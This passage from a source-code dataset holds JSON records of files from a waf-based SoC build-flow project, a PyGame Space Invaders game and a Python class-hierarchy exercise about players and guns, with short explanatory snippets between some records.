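`strtolist` in the SFFutil.py record above is the normalization that lets the wscripts pass either `use='l2,l2_5'` or a real list. Condensed from the file, with the error swapped for a built-in `TypeError` so the snippet runs stand-alone:

```python
# Behavior of SFFutil.strtolist; SFFerrors.Error is replaced with
# TypeError here only to keep the example self-contained.
def strtolist(string_or_list):
    if isinstance(string_or_list, str):
        return [s.strip() for s in string_or_list.split(',')]
    elif isinstance(string_or_list, (list, set)):
        return string_or_list
    raise TypeError('expected str, list or set')

print(strtolist('l2, l2_5'))   # ['l2', 'l2_5'] -- whitespace stripped
print(strtolist(['keep']))     # ['keep'] -- sequences pass through as-is
```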
{
"alpha_fraction": 0.6600000262260437,
"alphanum_fraction": 0.6600000262260437,
"avg_line_length": 23.5,
"blob_id": "98956fa15ce836139d336435d4dd5734aa72a0f8",
"content_id": "bb999b46ec00bc6c532db262ae6b5a548dd92f65",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 50,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 2,
"path": "/waf_test/RTL_compiler/basic/uart/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "\ndef configure(ctx):\n ctx.SFFUnits.add('uart')\n"
},
{
"alpha_fraction": 0.644444465637207,
"alphanum_fraction": 0.644444465637207,
"avg_line_length": 20.5,
"blob_id": "0f81246c5f319803f452275f45f655bcbb40f1c7",
"content_id": "cc8040b7c5b7a713edeb9739ee2168c8fc004e0c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 45,
"license_type": "permissive",
"max_line_length": 22,
"num_lines": 2,
"path": "/waf_test/find_src/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "\ndef configure(ctx):\n ctx.SFFUnits.add()\n\n"
},
{
"alpha_fraction": 0.6641749739646912,
"alphanum_fraction": 0.6672203540802002,
"avg_line_length": 23.079999923706055,
"blob_id": "a957ce0371b2d386e555d08d51aeb8652577404d",
"content_id": "948782436a31c78ae44f64658e60b22d9df4e115",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3612,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 150,
"path": "/admin/waf/waf-1.8.14/waflib/extras/cfg_cross_gnu.py",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n# -*- coding: utf-8 vi:ts=4:noexpandtab\n# Tool to provide dedicated variables for cross-compilation\n\n__author__ = __maintainer__ = \"Jérôme Carretero <[email protected]>\"\n__copyright__ = \"Jérôme Carretero, 2014\"\n\n\"\"\"\n\nThis tool allows to use environment variables to define cross-compilation things,\nmostly used when you use build variants.\n\nUsage:\n\n- In your build script::\n\n def configure(cfg):\n ...\n conf.load('c_cross_gnu')\n for variant in x_variants:\n conf.xcheck_host()\n conf.xcheck_host_var('POUET')\n ...\n\n ...\n\n- Then::\n\n CHOST=arm-hardfloat-linux-gnueabi waf configure\n\n env arm-hardfloat-linux-gnueabi-CC=\"clang -...\" waf configure\n\n CFLAGS=... CHOST=arm-hardfloat-linux-gnueabi HOST_CFLAGS=-g waf configure\n\n HOST_CC=\"clang -...\" waf configure\n\n\"\"\"\n\nimport os\nfrom waflib import Utils, Configure\n\ntry:\n\tfrom shlex import quote\nexcept ImportError:\n\tfrom pipes import quote\n\[email protected]\ndef xcheck_prog(conf, var, tool, cross=False):\n\tvalue = os.environ.get(var, '')\n\tvalue = Utils.to_list(value)\n\n\tif not value:\n\t\treturn\n\n\tconf.env[var] = value\n\tif cross:\n\t\tpretty = 'cross-compilation %s' % var\n\telse:\n\t\tpretty = var\n\tconf.msg('Will use %s' % pretty,\n\t \" \".join(quote(x) for x in value))\n\[email protected]\ndef xcheck_envar(conf, name, wafname=None, cross=False):\n\twafname = wafname or name\n\tvalue = os.environ.get(name, None)\n\tvalue = Utils.to_list(value)\n\n\tif not value:\n\t\treturn\n\n\tconf.env[wafname] += value\n\tif cross:\n\t\tpretty = 'cross-compilation %s' % wafname\n\telse:\n\t\tpretty = wafname\n\tconf.msg('Will use %s' % pretty,\n\t \" \".join(quote(x) for x in value))\n\[email protected]\ndef xcheck_host_prog(conf, name, tool, wafname=None):\n\twafname = wafname or name\n\thost = conf.env.CHOST\n\tspecific = None\n\tif host:\n\t\tspecific = os.environ.get('%s-%s' % (host[0], name), None)\n\n\tif specific:\n\t\tvalue = Utils.to_list(specific)\n\t\tconf.env[wafname] += value\n\t\tconf.msg('Will use cross-compilation %s' % name,\n\t\t \" \".join(quote(x) for x in value))\n\t\treturn\n\n\tconf.xcheck_prog('HOST_%s' % name, tool, cross=True)\n\n\tif conf.env[wafname]:\n\t\treturn\n\n\tvalue = None\n\tif host:\n\t\tvalue = '%s-%s' % (host[0], tool)\n\n\tif value:\n\t\tconf.env[wafname] = value\n\t\tconf.msg('Will use cross-compilation %s' % wafname, value)\n\[email protected]\ndef xcheck_host_envar(conf, name, wafname=None):\n\twafname = wafname or name\n\n\thost = conf.env.CHOST\n\tspecific = None\n\tif host:\n\t\tspecific = os.environ.get('%s-%s' % (host[0], name), None)\n\n\tif specific:\n\t\tvalue = Utils.to_list(specific)\n\t\tconf.env[wafname] += value\n\t\tconf.msg('Will use cross-compilation %s' % name,\n\t\t \" \".join(quote(x) for x in value))\n\t\treturn\n\n\tconf.xcheck_envar('HOST_%s' % name, wafname, cross=True)\n\n\[email protected]\ndef xcheck_host(conf):\n\tconf.xcheck_envar('CHOST', cross=True)\n\tconf.xcheck_host_prog('CC', 'gcc')\n\tconf.xcheck_host_prog('CXX', 'g++')\n\tconf.xcheck_host_prog('LINK_CC', 'gcc')\n\tconf.xcheck_host_prog('LINK_CXX', 'g++')\n\tconf.xcheck_host_prog('AR', 'ar')\n\tconf.xcheck_host_prog('AS', 'as')\n\tconf.xcheck_host_prog('LD', 'ld')\n\tconf.xcheck_host_envar('CFLAGS')\n\tconf.xcheck_host_envar('CXXFLAGS')\n\tconf.xcheck_host_envar('LDFLAGS', 'LINKFLAGS')\n\tconf.xcheck_host_envar('LIB')\n\tconf.xcheck_host_envar('PKG_CONFIG_LIBDIR')\n\tconf.xcheck_host_envar('PKG_CONFIG_PATH')\n\t# TODO find a better solution than 
this ugliness\n\tif conf.env.PKG_CONFIG_PATH or conf.env.PKG_CONFIG_LIBDIR:\n\t\tconf.find_program('pkg-config', var='PKGCONFIG')\n\t\tconf.env.PKGCONFIG = [\n\t\t 'env',\n\t\t 'PKG_CONFIG_LIBDIR=%s' % (conf.env.PKG_CONFIG_LIBDIR[0]),\n\t\t 'PKG_CONFIG_PATH=%s' % (conf.env.PKG_CONFIG_PATH[0]),\n\t\t] + conf.env.PKGCONFIG\n"
},
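`xcheck_host_prog` in the cfg_cross_gnu.py record above resolves a cross tool in three steps: a host-specific variable such as `<CHOST>-CC`, then `HOST_CC`, then the conventional `<CHOST>-<tool>` name. Reduced to a plain function (the environment variable names follow the tool's docstring; the rest is illustrative):

```python
# Resolution order of xcheck_host_prog, stripped of waf plumbing.
import os

def host_tool(name, tool):
    chost = os.environ.get('CHOST')
    if chost:
        specific = os.environ.get('{0}-{1}'.format(chost, name))
        if specific:                          # e.g. arm-...-gnueabi-CC=clang
            return specific
    generic = os.environ.get('HOST_{0}'.format(name))
    if generic:                               # e.g. HOST_CC="clang -..."
        return generic
    if chost:
        return '{0}-{1}'.format(chost, tool)  # e.g. arm-...-gnueabi-gcc
    return None                               # fall back to normal detection

print(host_tool('CC', 'gcc'))
```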
{
"alpha_fraction": 0.6226415038108826,
"alphanum_fraction": 0.6415094137191772,
"avg_line_length": 24.5,
"blob_id": "de2e3a7f81cb6678516a95901151d82043250ae6",
"content_id": "3befbebaa7c14a7248ca80f75c5e98ab16ff91e0",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 53,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 2,
"path": "/waf_test/basic_dependencies/l4/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "\ndef configure(ctx):\n ctx.SFFUnits.add(use='l3')\n\n"
},
{
"alpha_fraction": 0.6183857917785645,
"alphanum_fraction": 0.6208975315093994,
"avg_line_length": 28.27450942993164,
"blob_id": "471acb804a27a806efc3204d93b8ee28180e41c9",
"content_id": "947948bb36941cbcfc8b1833f2325ad9adf95da7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5972,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 204,
"path": "/admin/waf/waf-extensions/SFFbuild.py",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# encoding: utf-8\n# Matthew Swabey, 2015\n# John Skubic, 2017\n\n\"\"\"\nClasses and helper functions used to provide\n\"sim_source\"\n\"verify_source\"\n\"dump_source\"\n\"\"\"\n\nimport os\nfrom waflib import Context\nfrom waflib import Build\nfrom waflib import Logs\nfrom waflib import Node\nfrom waflib import TaskGen\nfrom waflib import Task\nfrom waflib import Utils\nfrom waflib.Configure import conf\nfrom waflib.TaskGen import feature, before_method, after_method\nfrom SFFbuildmgr import SFF_verilog_scan\nfrom SFFbuildmgr import SFFUnitsCont, SFFUnit, SFFView, load_SFFUnits\nimport pickle\n# import needed simulation environments \nimport SFFincisive\nimport SFFmodelsim\n\nINCISIVE_ENV = 'incisive'\nMODELSIM_ENV = 'modelsim'\nVALID_ENVS = [INCISIVE_ENV, MODELSIM_ENV]\n\nSRC_DUMP = 'srcs.dump'\nINC_DUMP = 'incs.dump' \n\ndef get_sim_env():\n \"\"\"\n Checks the environment variables to decide the current simulation environment.\n \"\"\"\n sim_env = os.environ.get('SFF_SIM_ENV')\n if not (sim_env in VALID_ENVS):\n print(\"Unexpected Simulation Environment: \" + str(sim_env))\n print(\"Defaulting to \" + VALID_ENVS[0])\n return VALID_ENVS[0]\n return sim_env\n\ndef configure(ctx):\n \"\"\"\n Simulator: Find all the necessary parts of the chosen Simulator.\n \"\"\"\n sim_env = get_sim_env()\n\n if sim_env == INCISIVE_ENV:\n SFFincisive.configure(ctx)\n elif sim_env == MODELSIM_ENV:\n SFFmodelsim.configure(ctx) \n\nclass verify_source_ctx(Build.BuildContext):\n \"\"\"\n Subclass waflib.Build.BuildContext to create a new command called\n verify_source. This command will is a placeholder and will run\n sim_source after setting the ctx.env['verify_source'] key.\n \"\"\"\n cmd = 'verify_source'\n fun = 'verify_source'\n\nContext.g_module.__dict__['verify_source_ctx'] = verify_source_ctx\n\"\"\"\nInject the new verify_source command into the running waf build. Requires the\ntool be loaded in the options section to make it exist in both configure and\nbuild\n\"\"\"\n\ndef verify_source(ctx):\n sim_env = get_sim_env()\n\n if sim_env == INCISIVE_ENV:\n SFFincisive._simulate(ctx, '-exit')\n elif sim_env == MODELSIM_ENV:\n SFFmodelsim._simulate(ctx, '-c -do \"run -a;q\"')\n\nContext.g_module.__dict__['verify_source'] = verify_source\n\"\"\"Inject the verify_source command into the wscript\"\"\"\n\nclass sim_source_ctx(Build.BuildContext):\n \"\"\"\n Subclass waflib.Build.BuildContext to create a new command called\n sim_source. This will operate exactly like a build command but find and\n execute functions from wscript files called 'sim_source'\n \"\"\"\n cmd = 'sim_source'\n fun = 'sim_source'\n\nContext.g_module.__dict__['sim_source_ctx'] = sim_source_ctx\n\"\"\"\nInject the new sim_source command into the running waf build. Requires the tool\nbe loaded in the options section to make it exist in both configure and build\n\"\"\"\n\ndef sim_source(ctx):\n sim_env = get_sim_env()\n\n if sim_env == INCISIVE_ENV:\n SFFincisive._simulate(ctx, '-gui')\n elif sim_env == MODELSIM_ENV:\n SFFmodelsim._simulate(ctx, '')\n\nContext.g_module.__dict__['sim_source'] = sim_source\n\"\"\"Inject the sim_source command into the wscript\"\"\"\n\nclass dump_source_ctx(Build.BuildContext):\n cmd = 'dump_source'\n fun = 'dump_source'\n\nContext.g_module.__dict__['dump_source_ctx'] = dump_source_ctx\n\ndef dump_source(ctx):\n \"\"\" \n Load the SFFUnits into the system. 
\n Output each file to standard out.\n \"\"\"\n ctx.env['SFFUnits'] = load_SFFUnits(ctx)\n\n \"\"\"\n Creates the directory path and nodes in the build directory.\n Creates a taskgen from each other library in units_hdl\n \"\"\"\n top = ctx.env['SFFUnits'].getunit(ctx.env.top_level)\n\n \"\"\"\n Ensure the output files are all cleared before running the command\n to prevent duplicate files in the output.\n \"\"\"\n for u in top.synu_deps + top.simu_deps:\n lib = u.script.parent.get_bld().make_node('work_dump')\n src_file = ctx.out_dir + '/' + lib.bldpath() + '/' + SRC_DUMP\n inc_file = ctx.out_dir + '/' + lib.bldpath() + '/' + INC_DUMP\n try:\n os.remove(src_file)\n except:\n pass\n try:\n os.remove(inc_file)\n except:\n pass\n \n \n for u in top.synu_deps + top.simu_deps:\n lib = u.script.parent.get_bld().make_node('work_dump')\n lib.mkdir()\n \n if u.use('use'):\n tsk = DumpTask(\n name=u.name,\n source=u.use('src'),\n includes=u.use('includes'),\n after=u.use('use'),\n output=lib,\n scan=SFF_verilog_scan,\n env=ctx.env)\n ctx.add_to_group(tsk) \n else:\n tsk = DumpTask(\n name=u.name,\n source=u.use('src'),\n includes=u.use('includes'),\n output=lib,\n scan=SFF_verilog_scan,\n env=ctx.env)\n ctx.add_to_group(tsk)\n\nContext.g_module.__dict__['dump_source'] = dump_source\n\nclass DumpTask(Task.Task):\n def __init__(self, *k, **kw):\n Task.Task.__init__(self, *k, **kw)\n\n self.set_inputs(list(kw['source']))\n self.set_outputs(kw['output'])\n self.includes = kw['includes']\n from types import MethodType\n self.scan = MethodType(kw['scan'],self)\n\n def __str__(self):\n return '%s: %s\\n' % (self.__class__.__name__,self.outputs[0])\n\n def run(self):\n src = ''\n for s in self.inputs:\n src += s.bldpath() + '\\n'\n tgt = self.outputs[0].bldpath()\n incs = ''\n if hasattr(self.generator,'includes'):\n incs = ''\n for inc in getattr(self.generator,'includes'):\n incs += inc.bldpath() + '\\n'\n src_file = self.outputs[0].bldpath()+'/'+ SRC_DUMP\n inc_file = self.outputs[0].bldpath()+'/'+ INC_DUMP\n cmd_src = \"echo '%s' >> %s\" % (src, src_file)\n cmd_include = \"echo '%s' >> %s\" % (incs, inc_file)\n cmd = \"%s;%s\" % (cmd_src, cmd_include)\n \n return self.exec_command(cmd)\n"
},
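`get_sim_env` in the SFFbuild.py record above is the single dispatch point between the Incisive and ModelSim back ends. Its fallback behavior, condensed from the file (the warning prints are omitted here):

```python
# Condensed get_sim_env from SFFbuild.py: an unknown or unset SFF_SIM_ENV
# falls back to the first entry of VALID_ENVS.
import os

VALID_ENVS = ['incisive', 'modelsim']

def get_sim_env():
    sim_env = os.environ.get('SFF_SIM_ENV')
    if sim_env not in VALID_ENVS:
        return VALID_ENVS[0]
    return sim_env

os.environ['SFF_SIM_ENV'] = 'modelsim'
assert get_sim_env() == 'modelsim'
del os.environ['SFF_SIM_ENV']
assert get_sim_env() == 'incisive'   # unset selects the default back end
```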
{
"alpha_fraction": 0.6544789671897888,
"alphanum_fraction": 0.6563071012496948,
"avg_line_length": 21.79166603088379,
"blob_id": "a54eee2e5b971a75c70b37ff5cf00a1355190d95",
"content_id": "bd4ce6c6c8b79542e2c20a1afcc10dd64cb6cb4e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 547,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 24,
"path": "/waf_test/RTL_compiler/basic/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# encoding: utf-8\n\nimport os\ntoolpath = os.environ['WAFDIR'] + '/../waf-extensions'\n\ntop = '.'\nout = 'build'\n\ndef options(ctx):\n ctx.load('SoC_build_mgr', tooldir=toolpath)\n ctx.load('Incisive', tooldir=toolpath)\n ctx.load('RTL_compiler', tooldir=toolpath)\n ctx.load('why')\n\ndef configure(ctx):\n ctx.load('SoC_build_mgr', tooldir=toolpath)\n ctx.load('Incisive', tooldir=toolpath)\n ctx.load('RTL_compiler', tooldir=toolpath)\n ctx.recurse('uart')\n ctx.recurse('dual_uart')\n\ndef build(ctx):\n pass\n"
},
{
"alpha_fraction": 0.5789473652839661,
"alphanum_fraction": 0.6184210777282715,
"avg_line_length": 36,
"blob_id": "f5a12af070335d3d289426e41bd48b9c3581c3fd",
"content_id": "3b9c7e69ce8f37cf0575547ecd5d43d9f15a11a2",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 76,
"license_type": "permissive",
"max_line_length": 53,
"num_lines": 2,
"path": "/waf_test/basic_dependencies/basic_dependencies/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "\ndef configure(ctx):\n ctx.SFFUnits.add(tb='foo',use='l4',tb_use='l2_5')\n\n"
}
] | 25 |
FurkanAdemoglu/PyGame | https://github.com/FurkanAdemoglu/PyGame | 005ab4b87f3e088a74a9dd35d1925631f6629f7e | e1761d269948b13653fbf1cff858afef52907b69 | 777973482b3df7db1cefd9998b6e9fbbde2f8162 | refs/heads/master | 2022-11-05T08:31:50.821829 | 2020-06-15T09:32:51 | 2020-06-15T09:32:51 | 272,396,618 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5756648778915405,
"alphanum_fraction": 0.6041421294212341,
"avg_line_length": 22.715116500854492,
"blob_id": "f14fb8d48a9501e9da237fd6e7de678ef851807d",
"content_id": "46680571a48f415c62e0392daf43c371b32229b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4249,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 172,
"path": "/PyGame/main.py",
"repo_name": "FurkanAdemoglu/PyGame",
"src_encoding": "UTF-8",
"text": "import pygame\r\nimport random\r\nimport math\r\nfrom pygame import mixer\r\n#Initialize the pygame\r\npygame.init()\r\n\r\n\r\n#create screen\r\nscreen= pygame.display.set_mode((800,600))\r\n\r\n#Background\r\nbackground=pygame.image.load('background.png')\r\n\r\n#Background Sound\r\nmixer.music.load('background.wav')\r\nmixer.music.play(-1)\r\n\r\n\r\n#Title and Icon\r\npygame.display.set_caption(\"Space Invaders\")\r\nicon=pygame.image.load('technology.png')\r\npygame.display.set_icon(icon)\r\n\r\n#Player\r\nplayerImg=pygame.image.load('gaming.png')\r\nplayerX=370\r\nplayerY=480\r\nplayerX_change=0\r\n\r\n#Enemy\r\nenemyImg=[]\r\nenemyX=[]\r\nenemyY=[]\r\nenemyX_change=[]\r\nenemyY_change=[]\r\nnum_of_enemies=6\r\nfor i in range(num_of_enemies):\r\n enemyImg.append(pygame.image.load('enemy.png'))\r\n enemyX.append(random.randint(0,735))\r\n enemyY.append(random.randint(50,150))\r\n enemyX_change.append(4)\r\n enemyY_change.append(40)\r\n\r\n#Bullet\r\n\r\n#Ready-You cant see the bullet on the screen\r\n#Fire- The bullet is currently moving\r\nbulletImg=pygame.image.load('bullet.png')\r\nbulletX=0\r\nbulletY=480\r\nbulletX_change=0\r\nbulletY_change=10\r\nbullet_state=\"ready\"\r\n\r\n#Score\r\nscore_value=0\r\nfont=pygame.font.Font('freesansbold.ttf',32)\r\n\r\ntextX=10\r\ntextY=10\r\n\r\n#Game Over Text\r\nover_font=pygame.font.Font('freesansbold.ttf',64)\r\n\r\ndef show_score(x,y):\r\n score=font.render(\"Score:\"+str(score_value),True,(255,255,255))\r\n screen.blit(score,(x,y))\r\n\r\ndef game_over_text():\r\n over_text=over_font.render(\"GAME OVER\",True,(255,255,255))\r\n screen.blit(over_text,(200,250))\r\n\r\n\r\ndef player(x,y):\r\n screen.blit(playerImg,(x,y))\r\n\r\ndef enemy(x,y,i):\r\n screen.blit(enemyImg[i],(x,y))\r\n\r\ndef fire_bullet(x,y):\r\n global bullet_state\r\n bullet_state=\"fire\"\r\n screen.blit(bulletImg,(x+16,y+10))\r\n\r\ndef isCollision(enemyX,enemyY,bulletX,bulletY):\r\n distance=math.sqrt((math.pow(enemyX-bulletX,2))+(math.pow(enemyY-bulletY,2)))\r\n if distance <27:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\n\r\n#Game Loop\r\nrunning=True\r\nwhile running:\r\n #RGB=RED GREEN BLUE\r\n screen.fill((0, 0, 0))\r\n\r\n #Background Image\r\n screen.blit(background,(0,0))\r\n for event in pygame.event.get():\r\n if event.type==pygame.QUIT:\r\n running=False\r\n if event.type==pygame.KEYDOWN:\r\n\r\n if event.key==pygame.K_LEFT:\r\n playerX_change=-5\r\n if event.key ==pygame.K_RIGHT:\r\n playerX_change=5\r\n if event.key==pygame.K_SPACE:\r\n if bullet_state is \"ready\":\r\n\r\n bullet_Sound=mixer.Sound('laser.wav')\r\n bullet_Sound.play()\r\n #Get the current x coordinate of the spaceship\r\n bulletX=playerX\r\n fire_bullet(bulletX,bulletY)\r\n\r\n if event.type ==pygame.KEYUP:\r\n if event.key==pygame.K_LEFT or event.key==pygame.K_RIGHT:\r\n playerX_change=0\r\n\r\n #Checking for boundries of spacesship so it doesn't go out pf bounds\r\n playerX+=playerX_change\r\n if playerX<=0:\r\n playerX=0\r\n elif playerX>=736:\r\n playerX=736\r\n #Enemy Movement\r\n for i in range(num_of_enemies):\r\n #Game Over\r\n if enemyY[i]>500:\r\n for j in range(num_of_enemies):\r\n enemyY[j]=2000\r\n game_over_text()\r\n break\r\n\r\n enemyX[i] += enemyX_change[i]\r\n if enemyX[i] <= 0:\r\n enemyX_change[i] = 4\r\n enemyY[i]+=enemyY_change[i]\r\n elif enemyX[i] >= 736:\r\n enemyX_change[i] = -4\r\n enemyY[i]+=enemyY_change[i]\r\n # Collision\r\n collision = isCollision(enemyX[i], enemyY[i], bulletX, bulletY)\r\n if collision:\r\n 
explosion_Sound=mixer.Sound('explosion.wav')\r\n explosion_Sound.play()\r\n bulletY = 480\r\n bullet_state = \"ready\"\r\n score_value += 1\r\n\r\n enemyX [i]= random.randint(0, 800)\r\n enemyY [i]= random.randint(50, 150)\r\n enemy(enemyX[i],enemyY[i],i)\r\n #Bullet movement\r\n if bulletY<=0:\r\n bulletY=480\r\n bullet_state=\"ready\"\r\n\r\n if bullet_state is \"fire\":\r\n fire_bullet(playerX,bulletY)\r\n bulletY-=bulletY_change\r\n\r\n\r\n\r\n player(playerX,playerY)\r\n show_score(textX,textY)\r\n pygame.display.update()"
}
] | 1 |
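The PyGame record's `isCollision` treats bullet and enemy as circles and registers a hit when their centers are closer than 27 pixels. The same check, plus a sqrt-free variant (my addition, not in the repo) that compares squared distances:

```python
# Circle-overlap test from PyGame/main.py (threshold 27 is the game's
# value); is_collision_fast is an equivalent sqrt-free rewrite of mine.
import math

def is_collision(ex, ey, bx, by, radius=27):
    return math.sqrt((ex - bx) ** 2 + (ey - by) ** 2) < radius

def is_collision_fast(ex, ey, bx, by, radius=27):
    return (ex - bx) ** 2 + (ey - by) ** 2 < radius * radius

assert is_collision(100, 100, 110, 110)   # distance ~14.1 < 27
assert is_collision(100, 100, 110, 110) == is_collision_fast(100, 100, 110, 110)
```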
dineshc810/Python_oops | https://github.com/dineshc810/Python_oops | 2de32c3029732b13e6fe3e00c46437ee11c84ee7 | 67ed1aa15e20fb4550f3f12508c9ad6081744231 | 25494ded3db46ab9f1c80784aa01dbd5e7de31c6 | refs/heads/master | 2022-11-20T18:24:56.077704 | 2020-07-27T12:13:08 | 2020-07-27T12:13:08 | 282,821,491 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4829559922218323,
"alphanum_fraction": 0.49224117398262024,
"avg_line_length": 28.778656005859375,
"blob_id": "ea1b8ed4537fe7665bec233e44d11ab1c1378da2",
"content_id": "317452ae67f422cb0da59a66f21840d973224611",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7862,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 253,
"path": "/python_oops.py",
"repo_name": "dineshc810/Python_oops",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 22 18:21:07 2020\r\n\r\n@author: Dinesh.Choudhary\r\n\"\"\"\r\n \r\nclass Player:\r\n def __init__(self):\r\n self.type=self.__class__.__name__\r\n\r\n\r\nclass Terrorist(Player): \r\n def __init__(self):\r\n self.type=f'{Player.__name__}:{self.__class__.__name__}'\r\n \r\nclass Counter_Terrorist(Player): \r\n def __init__(self):\r\n self.type=f'{Player.__name__}:{self.__class__.__name__}'\r\n\r\n\r\n \r\nclass T1(Terrorist): \r\n def __init__(self):\r\n self.type=f'{Player. __name__}:{Terrorist.__name__}:{self.__class__.__name__}'\r\n \r\nclass T2(Terrorist): \r\n def __init__(self):\r\n self.type=f'{Player. __name__}:{Terrorist.__name__}:{self.__class__.__name__}'\r\n \r\nclass CT1(Counter_Terrorist): \r\n def __init__(self):\r\n self.type=f'{Player. __name__}:{Counter_Terrorist.__name__}:{self.__class__.__name__}'\r\n \r\nclass CT2(Counter_Terrorist): \r\n def __init__(self):\r\n self.type=f'{Player. __name__}:{Counter_Terrorist.__name__}:{self.__class__.__name__}'\r\n \r\n\r\n\r\n\r\nclass Gun:\r\n def __init__(self):\r\n self.type=self.__class__.__name__\r\n \r\n \r\nclass Pistol(Gun):\r\n def __init__(self):\r\n self.type=f'{Gun.__name__}:{self.__class__.__name__}'\r\n\r\nclass Rifle(Gun):\r\n def __init__(self):\r\n self.type=f'{Gun.__name__}:{self.__class__.__name__}'\r\n\r\n\r\n\r\nclass Flare_Gun(Pistol):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Pistol.__name__}:{self.__class__.__name__}'\r\n \r\nclass Deagle(Pistol):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Pistol.__name__}:{self.__class__.__name__}' \r\n\r\nclass Skorpion(Pistol):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Pistol.__name__}:{self.__class__.__name__}' \r\n\r\nclass Assault_Rifle(Rifle):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Rifle.__name__}:{self.__class__.__name__}'\r\n \r\nclass Sniper(Rifle):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Rifle.__name__}:{self.__class__.__name__}'\r\n \r\nclass Shotgun(Rifle):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Rifle.__name__}:{self.__class__.__name__}'\r\n\r\nclass Machinegun(Rifle):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Rifle.__name__}:{self.__class__.__name__}' \r\n \r\nclass Groza(Assault_Rifle):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Rifle.__name__}:{Assault_Rifle.__name__}:{self.__class__.__name__}'\r\n \r\nclass AK47(Assault_Rifle):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Rifle.__name__}:{Assault_Rifle.__name__}:{self.__class__.__name__}'\r\n \r\nclass AWM(Sniper):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Rifle.__name__}:{Sniper.__name__}:{self.__class__.__name__}'\r\n\r\nclass M24(Sniper):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Rifle.__name__}:{Sniper.__name__}:{self.__class__.__name__}' \r\n \r\nclass DBS(Shotgun):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Rifle.__name__}:{Shotgun.__name__}:{self.__class__.__name__}'\r\n \r\nclass S686(Shotgun):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Rifle.__name__}:{Shotgun.__name__}:{self.__class__.__name__}' \r\n \r\nclass MG42(Machinegun):\r\n def __init__(self):\r\n self.type=f'{Gun. __name__}:{Rifle.__name__}:{Machinegun.__name__}:{self.__class__.__name__}' \r\n \r\nclass ThompsonMG(Machinegun):\r\n def __init__(self):\r\n self.type=f'{Gun. 
__name__}:{Rifle.__name__}:{Machinegun.__name__}:{self.__class__.__name__}' \r\n \r\n\r\n\r\nplayer=Player()\r\nterrorist=Terrorist()\r\ncounter_terrorist=Counter_Terrorist() \r\nt1=T1()\r\nt2=T2()\r\nct1=CT1()\r\nct2=CT2()\r\n\r\n\r\ngun=Gun()\r\n\r\npistol=Pistol()\r\nrifle=Rifle()\r\n\r\nflare_gun=Flare_Gun()\r\ndeagle=Deagle()\r\nskorpion=Skorpion()\r\nassault_rifle=Assault_Rifle()\r\nsniper=Sniper()\r\nshotgun=Shotgun()\r\nmachinegun=Machinegun()\r\n\r\ngroza=Groza()\r\nak47=AK47()\r\nawm=AWM()\r\nm24=M24()\r\ndbs=DBS()\r\ns686=S686()\r\nmg42=MG42()\r\nthompsonmg=ThompsonMG()\r\n\r\n\r\n\r\n\r\n\r\n#main\r\n\r\nprint(\"Enter the player: (Terrorist)(Counter Terrorist)\")\r\nplayer_input=input()\r\n\r\nprint(\"Enter the player type: (T1)(T2)(CT1)(CT2)\")\r\nplayer_type_input=input()\r\n\r\nprint(\"Enter the gun: (Pistol)(Rifle)\")\r\ngun_input=input()\r\n\r\nprint(\"Enter the gun type: (Flare gun)(Deagle)(Skorpion)(Assault Rifle)(Sniper)(Shotgun)(Machine gun)\")\r\ngun_type_input=input()\r\n\r\nprint(\"Enter the gun sub type: (Groza)(AK47)(M24)(AWM)(DBS)(S686)((MG42)(Thompson MG)\")\r\ngun_subtype_input=input()\r\n\r\n\r\n\r\nif(player_input=='Terrorist'):\r\n if 